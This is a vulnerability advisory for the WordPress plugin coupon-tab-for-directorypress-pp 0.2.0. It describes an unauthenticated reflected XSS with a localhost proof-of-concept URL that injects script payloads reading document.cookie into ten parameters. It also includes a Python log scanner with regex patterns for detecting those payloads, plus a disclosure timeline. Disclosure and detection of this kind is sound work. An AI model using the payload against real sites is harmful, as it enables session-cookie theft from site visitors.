wp-plugin : coupon-tab-for-directorypress-pp – A3-Cross-Site Scripting (XSS)

Plugin Details

Plugin Name : coupon-tab-for-directorypress-pp
Affected Version : 0.2.0 (and most probably lower versions, if any)
Vulnerability : A3-Cross-Site Scripting (XSS)
Identified by : Anant Shrivastava

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC (Proof of Concept) :

http://localhost/wp-content/plugins/coupon-tab-for-directorypress-pp/pp-coupon-popup.php?cfh=</style><script>alert(document.cookie)</script>&cc=cc'><script>alert(document.cookie)</script>&cb=cb'><script>alert(document.cookie)</script>&cfd=cfd&ce=ce'><script>alert(document.cookie)</script>&cd=cd'><script>alert(document.cookie)</script>&cdt=cdt'><script>alert(document.cookie)</script>&cdet=cdet'><script>alert(document.cookie)</script>&cs=cs'><script>alert(document.cookie)</script>&cfw=cfw'></style><script>alert(document.cookie)</script>&surl=surl'><script>alert(document.cookie)</script>&

Vulnerable Parameters : cfh, cc, cb, cd, ce, cdt, cdet, cs, cfw, surl

Type of XSS : Reflected
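As an added example (not part of the advisory), the following Python scans web-server access-log lines for requests to the pp-coupon-popup.php endpoint whose advisory-listed parameters carry the breakout fragments seen in the PoC (a `</style>` breakout for cfh and cfw, a quote-then-`>` attribute breakout for the rest). The endpoint path and parameter list come from the advisory; the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Endpoint and parameter names taken from the advisory above.
VULNERABLE_PATH = "/wp-content/plugins/coupon-tab-for-directorypress-pp/pp-coupon-popup.php"
VULNERABLE_PARAMS = {"cfh", "cc", "cb", "cd", "ce", "cdt", "cdet", "cs", "cfw", "surl"}

# Fragments matching the shape of the PoC: a <script> tag, a </style> breakout
# (used for cfh and cfw) or a quote-then-'>' attribute breakout (the other params).
PAYLOAD_RE = re.compile(r"<\s*script|<\s*/\s*style|['\"]\s*>", re.IGNORECASE)

# Request line inside a combined-format access log: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def flag_request(log_line):
    """Return the advisory-listed parameters carrying a payload in this request (empty set if none)."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return set()
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith(VULNERABLE_PATH):
        return set()
    hits = set()
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name not in VULNERABLE_PARAMS:  # e.g. cfd appears in the PoC but is not in the list
            continue
        # parse_qs decodes once; unquote_plus again catches double-encoded attempts
        if any(PAYLOAD_RE.search(unquote_plus(v)) for v in values):
            hits.add(name)
    return hits


def scan(lines):
    """Return [(line number, sorted parameter names)] for every flagged request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hits = flag_request(line)
        if hits:
            findings.append((number, sorted(hits)))
    return findings


# Constructed sample log lines (not from the advisory): a PoC-style request to the
# plugin endpoint, a benign request to the same endpoint, and a non-plugin request.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Jul/2014:10:00:00 +0000] "GET /wp-content/plugins/coupon-tab-for-directorypress-pp/pp-coupon-popup.php?cfh=%3C/style%3E%3Cscript%3Ealert(1)%3C/script%3E&cc=cc%27%3E%3Cscript%3Ealert(1)%3C/script%3E&cfd=cfd HTTP/1.1" 200 512',
    '203.0.113.6 - - [07/Jul/2014:10:00:01 +0000] "GET /wp-content/plugins/coupon-tab-for-directorypress-pp/pp-coupon-popup.php?cfh=ff0000&cc=SAVE10 HTTP/1.1" 200 512',
    '203.0.113.7 - - [07/Jul/2014:10:00:02 +0000] "GET /index.php?s=%3Cscript%3E HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, params in scan(SAMPLE_LOG):
        print(f"line {number}: payload in {', '.join(params)}")
```

Only the first sample line is reported, with cfh and cc flagged; cfd is ignored because the advisory does not list it.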

 

Disclosure Timeline

Vendor Contacted : 2014-01-04
Plugin Status : Closed
Public Disclosure : July 7, 2014
CVE Number : Not assigned yet

Plugin Description :

Coupon Tab (pp-coupon-tab) creates a new tab on the directory
listing page of Directory Press. This tab is titled "Coupon"
and displays the coupons listed by the registered users.

This plugin requires DirectoryPress and has been tested up to
version 7.1.3 with a slight modification. Please check the
installation notes for details.
